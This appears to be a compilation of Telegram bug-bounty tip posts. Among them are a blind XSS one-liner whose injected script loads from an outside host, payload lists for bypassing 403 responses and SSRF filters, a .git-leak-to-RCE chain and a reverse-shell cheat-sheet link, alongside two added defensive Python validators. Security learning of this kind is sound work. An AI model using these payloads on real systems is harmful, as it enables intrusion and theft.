Blind XSS in app.pullreport.com████████ via /reviews/ratings/{uuid}
URL://
https://hackerone.com/reports/1558010
Tags:
#cybersecurity #hacking #bugbounty #bugbountytips #infosec #cybersec #blind_xss #xss
HackerOne
HackerOne disclosed on HackerOne: Blind XSS in...
**Summary:**
Hi,
While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com"....
👍2
Bug Bounty Tips
Explanation : What tool you can use for whatever bug it is
Credit: Patrik
URL://
https://blog.it-securityguard.com/pbbt.png
Tags:
#cybersecurity #bugbounty #bugbountytips #hacking #security #offsec
How to find & access Admin Panel by digging into JS files… https://medium.com/@ratnadip1998/how-to-find-access-admin-panel-by-digging-into-js-files-282d89391a2d
🔥2
~Pwning
1. Recon = Found log file: web/path/wget-log
2. Found Server IP in the logs file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE
Awesome Write-Ups And POCs🌵
Link :🔗
https://resource.dr4cun0.com
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
Look😃🔥
👍4
Guide for Beginner and Intermediate in Bug bounty
- Learn HTML.
Learning HTML is needed because, as a bug bounty hunter, you will be hunting on websites.
- Do a project on website development.
This will give you a good understanding of websites and how a website really works and functions.
By now you have a good understanding of websites.
- Learn and practice as much as you can on the OWASP Top 10; basically it contains the top 10 trending vulnerabilities in the current year.
- Go and read bug reports:
This will give you an understanding of how you need to think as a bug bounty hunter: https://twitter.com/Aacle_/status/1556301856317788160?s=20&t=yw73u2K7J50lrkT_JwMCVg
As a hacker you need to think like a hacker; then you will be able to become a good and professional bug bounty hunter.
Now it's time to try in the real world, so register on a bug bounty program like HackerOne or Bugcrowd and choose a target, not just any target, but an organization in which you will have a great chance to find bugs in the beginning.
Now Best of Luck👍 & Work Hard
If you like it, then please share the channel link with your friends
https://t.me/updatedwithCybersecurity
🔥3👍1
Best Specification laptop/pc for Penetration tester
#bugbounty #hacking #infosec #cybersecurity
Processor : It should have at least 6 cores and 8 threads
RAM : At least 8 GB of RAM, but I'll recommend 16 GB because you have to use different types of VMs on your laptop/PC
Storage : Give most priority to an SSD because it is much faster than an HDD, and that's why it makes your PC fast
Graphics : At least a 2 GB graphics card is needed for processes like brute forcing.
If your PC has at least the above specification, then you are all set
Thank you For Reading 😃
You can join my telegram group if you want : https://t.me/bugbountyresources
👍2
Blind XSS In X-Forwarded-For Header #bugbounty
subfinder -d target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"
#bugbountytips #infosec #cybersecurity
If you love it, you can join my channel : https://t.me/bugbountyresources
👍6
Get Reverse Shell
Using Bash, Netcat (Windows & Kali), Netcat (without -e option), Python, Perl, PHP
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
❤1
Bypass 304 (Not Modified) #bugbountytip
Request :
GET /admin HTTP/1.1
Host: target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete the "If-None-Match" header
➡Add a random character at the end of the "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty
👍3
Security Hardening Guides🌵
Collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.
Link :🔗
https://github.com/decalage2/awesome-security-hardening
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
🔥2
🎆Bypass 403🎆 #bugbountytips
🏹Using "X-Original-URL" header :
Request :
GET /admin HTTP/1.1
Host: target.com
Try this to bypass with
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
🏹Appending %2e after the first slash
Request :
http://target.com/admin => 403
Try to Bypass with
http://target.com/%2e/admin => 200
🏹Try adding dot (.), slash (/) and semicolon (;) in the URL
http://target.com/admin => 403
Try to Bypass with
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com//;//secret => 200
🏹Add "..;/" after the directory name
http://target.com/admin => 403
Try this to bypass using ..;/
http://target.com/admin..;/ => 200
🏹Try to uppercase the alphabet in the URL
http://target.com/admin => 403
Try with UPPERCASE :
http://target.com/aDmIN => 200
🏹Via Web Cache Poisoning
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
👍4
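Seen from the defending side, every variant in the post above works only when the access-control layer and the backend disagree about which path was requested. The following is an added example, not part of the original post: a front-end check that reduces the path to one canonical form before applying the deny rule and drops client-supplied override headers. The function names, the `/admin` rule and the case-insensitive routing are assumptions for illustration.

```python
from urllib.parse import unquote

PROTECTED = ("/admin",)                        # prefix taken from the post's examples
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url"}

def canonical_path(raw):
    """One canonical form for both the ACL and the backend, or None to reject."""
    path = unquote(raw.split("?", 1)[0])       # decode exactly once
    if "%" in path or "\\" in path or "\x00" in path:
        return None                            # double encoding or odd separators
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]             # drop ;path-parameters
        if seg in ("", "."):
            continue                           # collapses // and /./
        if seg == "..":
            if not out:
                return None                    # climbs above the root
            out.pop()
        else:
            out.append(seg.lower())            # assumption: case-insensitive routing
    return "/" + "/".join(out)

def authorize(raw_path, headers, is_admin=False):
    """Return (allowed, canonical_path, headers_to_forward) for one request."""
    # Headers that rewrite the routed URL are never accepted from a client.
    fwd = {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}
    path = canonical_path(raw_path)
    if path is None:
        return False, None, fwd
    protected = any(path == p or path.startswith(p + "/") for p in PROTECTED)
    return (is_admin or not protected), path, fwd
```

The backend must be handed the canonical path and the filtered headers, not the raw request line, otherwise the two layers can still disagree.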
Server Side Request Forgery(SSRF) #bugbounty #bugbountytips #infosec #cybersecurity
🏹Use The Whole IP Range For Testing SSRF (198.0.0.1-255)
🏹Use Different Encoding Schemes of https://127.0.0.1
▪ Hex Encoding https://0x7f.0x0.0x0.0x1
▪ Octal Encoding https://0177.0.0.01
▪ Dword Encoding https://2130706433
▪ URL Encoding https://%6c%6f%63%61%6c%68%6f%73%74
▪ Mixed Encoding https://0177.0.0.0x1
Also use 2130706433 or 017700000001
🏹Obfuscate Strings In URL Encode or Case Transformation (Blocked Words Bypass)
🏹Use Registered Domain Names That Resolve To 127.0.0.1
🏹Embed Credentials : https://attacker@victim.com
🏹Use URL Fragments '#' : https://attacker'#'victim.com (Remove the ' around the hash)
🏹Use DNS Subdomain Method : https://victim.com.evil.com
🏹Use Directory Method : https://attacker.com/victim.com
🏹Exploit Redirecting The Target
🏹Change The Referrer To Burp Collaborator (Blind Exploit)
🏹Use IPv6 addresses instead of IPv4
🏹Usable Protocols:
▪gopher://
▪file://
▪dict://
👍7
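The encodings in the post above defeat filters that compare the URL string against a blocklist. The following is an added example, not part of the original post: a server-side check that reduces the host to the address it actually denotes before deciding. The function names and the injectable `resolver` parameter are assumptions for illustration.

```python
import ipaddress, re, socket
from urllib.parse import urlsplit, unquote

NUM = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")

def parse_inet_aton(host):
    """IPv4 literal as inet_aton() reads it: 1-4 parts, each decimal, octal
    (leading 0) or hex (0x); the last part fills all remaining bytes."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(NUM.fullmatch(p) for p in parts):
        return None
    try:
        nums = [int(p, 16) if p[:2].lower() == "0x"
                else int(p, 8) if len(p) > 1 and p[0] == "0" else int(p)
                for p in parts]
    except ValueError:                       # "089" is not valid octal
        return None
    *head, last = nums
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(head))
    return ipaddress.IPv4Address(value)

def is_internal(ip):
    ip = getattr(ip, "ipv4_mapped", None) or ip    # unwrap ::ffff:a.b.c.d
    return not ip.is_global                  # loopback, private, link-local, reserved

def resolve(host):
    # Default resolver performs real DNS; callers may inject a stub instead.
    infos = socket.getaddrinfo(host, None)
    return [ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos]

def ssrf_verdict(url, resolver=resolve):
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False, "scheme or host"       # gopher://, file://, dict:// stop here
    host = unquote(u.hostname)               # userinfo is already stripped
    lit = parse_inet_aton(host)
    if lit is not None:
        addrs = [lit]
    else:
        try:
            addrs = [ipaddress.ip_address(host)]   # IPv6 literal
        except ValueError:
            addrs = resolver(host)           # DNS name: judge what it resolves to
    if not addrs or any(is_internal(a) for a in addrs):
        return False, "internal address"
    return True, "ok"
```

The fetch must then connect to the address that was validated, and every redirect hop has to pass the same check, otherwise a second DNS answer or a redirect undoes the decision.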
Find Subdomain from VirusTotal🔥
Bash One-liner 🌵#bugbountytips #infosec #bugbounty
curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-Za-z]))\w+" | sort -u
👍2
Web Application Security Mindmap🌱🔥
Download : 🌵
https://mindmeister.com/49183531/web-application-security?fullscreen=1
#bugbounty #bugbountytips #infosec
👍3